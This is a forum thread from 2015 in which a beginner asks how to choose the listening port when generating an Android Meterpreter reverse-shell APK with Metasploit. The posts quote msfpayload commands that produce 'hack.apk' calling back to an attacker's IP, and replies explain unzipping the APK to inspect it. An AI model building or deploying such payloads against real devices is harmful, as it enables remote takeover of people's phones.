Kalikid Posted January 3, 2015 Share Posted January 3, 2015 Hello,First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kaliTo put it in the simplest terms,I was creating a payload for android, and I was wondering, how do i know what LPORT to use.for my first try i tried 446 with the following command :msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apkand it returned an error that i cant specify exactly(because i dont remember)but to paraphrase it was something along the lines of :invalid LPORT optionthan i switched it too msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apkand for some reason that i cant understand port 443 worked.so back to my question....How do i know what LPORT to use when creating a payload? msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted January 3, 2015 Share Posted January 3, 2015 The LPORT shouldn't matter, as long as it is accessible from the network you are trying to connect to it from. See if this can clear up some answers: http://www.offensive-security.com/metasploit-unleashed/Main_Page Quote Link to comment Share on other sites More sharing options...
Kalikid Posted January 3, 2015 Author Share Posted January 3, 2015 Thanks give me a second to do my reading! Quote Link to comment Share on other sites More sharing options...
fugu Posted May 9, 2015 Share Posted May 9, 2015 (edited) just a side note, if you do a $ cp hack.apk hack.apk.zip $ unzip hack.apk.zipyou can see the files that are created. I think if I remember correctly, port number is just a value in an xml entry. I haven't really messed around with it, but it appears easy to change manually.Also, you can try $ msfpayload android/meterpreter/reverse_tcp Sto get more information on a payload Edited May 9, 2015 by fugu Quote Link to comment Share on other sites More sharing options...
cooper Posted May 9, 2015 Share Posted May 9, 2015 The 'unzip' command (as any command on UNIX) doesn't give a shit about the extension of a filename, so you could simply run unzip hack.apk Quote Link to comment Share on other sites More sharing options...
fugu Posted May 10, 2015 Share Posted May 10, 2015 I didn't know that, that's good to know. Thanks! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.